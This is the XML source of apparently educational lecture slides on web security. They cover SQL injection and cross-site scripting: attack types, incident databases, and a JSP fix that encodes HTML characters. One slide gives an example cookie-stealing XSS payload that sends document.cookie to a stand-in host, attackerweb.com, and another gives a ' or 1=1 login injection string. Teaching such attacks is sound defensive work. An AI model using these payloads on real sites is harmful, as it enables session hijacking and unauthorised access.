            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Signatures are developed from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>experience</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>and vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>http://www.xyz.com/login.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&amp;pwd=secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>http://www.xyz.com/login.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘ or 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&amp;pwd=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>How do we visit web pages?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Randomly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use case-based </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1709915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152400" y="514350"/>
            <a:ext cx="8610600" cy="800100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cross Site Scripting (XSS) vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37893" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2048767"/>
            <a:ext cx="8305800" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The generation of HTML contents with invalidated inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Inputs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> as valid HTML tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Change the intended behavior of generated web pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Visible symptoms (pop-up window) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Invisible symptoms (reading form fields, cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="6248400"/>
            <a:ext cx="1981200" cy="331076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
            <a:fld id="{9CC670BF-328A-4E94-9AF2-375B50B1E333}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2709928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sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518886" y="406400"/>
            <a:ext cx="8117114" cy="1016000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Posting a benign comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6">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18886" y="1611086"/>
            <a:ext cx="7943850" cy="5094514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="942415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266700" y="486511"/>
            <a:ext cx="8610600" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Viewing a benign comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="44034"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952500" y="2225846"/>
            <a:ext cx="7239000" cy="3619500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3769087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228600" y="600466"/>
            <a:ext cx="8686800" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Posting a malicious comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058"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390525" y="2295134"/>
            <a:ext cx="8362950" cy="3962400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3501398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304800" y="627743"/>
            <a:ext cx="8534400" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Viewing a malicious comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46083"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1104900" y="1745375"/>
            <a:ext cx="6674757" cy="4960225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="815785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190500" y="678543"/>
            <a:ext cx="8763000" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Viewing a malicious comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341084" y="1882322"/>
            <a:ext cx="8574315" cy="4823278"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Execution of attacker’s supplied code in victim’s browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ranked as #1 vulnerability by OWASP in 2010 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Visible (pop-up window) and invisible symptoms (accessing sensitive information)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="424631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sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="552481"/>
            <a:ext cx="8610600" cy="826376"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Posting a malicious script to steal cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45058"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643266" y="2069224"/>
            <a:ext cx="7857468" cy="4395952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4072266" y="4102976"/>
            <a:ext cx="3657600" cy="114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rgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> = ‘http://attackerweb.com/ steal.php?+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>’/&gt;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907499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304800" y="495301"/>
            <a:ext cx="8610600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>XSS attack types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39941" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395514" y="1973942"/>
            <a:ext cx="8458200" cy="4388757"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: Injected code is stored by server programs and used to generate response pages later</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:  Injected code is directly sent back to browsers by server programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOM-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>:  Injected code is processed by the client-side JavaScript without sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372146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algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>More list of incidents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19461" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (CVE) http://cve.mitre.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
              <a:t>Open Source Vulnerability Database (OSVDB), http://osvdb.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web-Application Security Consortium (WASC) http://www.webappsec.org/projects/whid/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Attack method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Outcome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25664905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266700" y="337155"/>
            <a:ext cx="8610600" cy="1172347"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>XSS vulnerable code and fixing example: JSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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2038350"/>
            <a:ext cx="4038600"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19300" y="3057694"/>
            <a:ext cx="4572000" cy="840230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reads an employee ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, from an HTTP request and displays it to the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>without sanitizing for meta characters.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="5783271"/>
            <a:ext cx="4572000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Preventing XSS by encoding HTML special characters in JSTL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082905" y="4476750"/>
            <a:ext cx="5885438" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
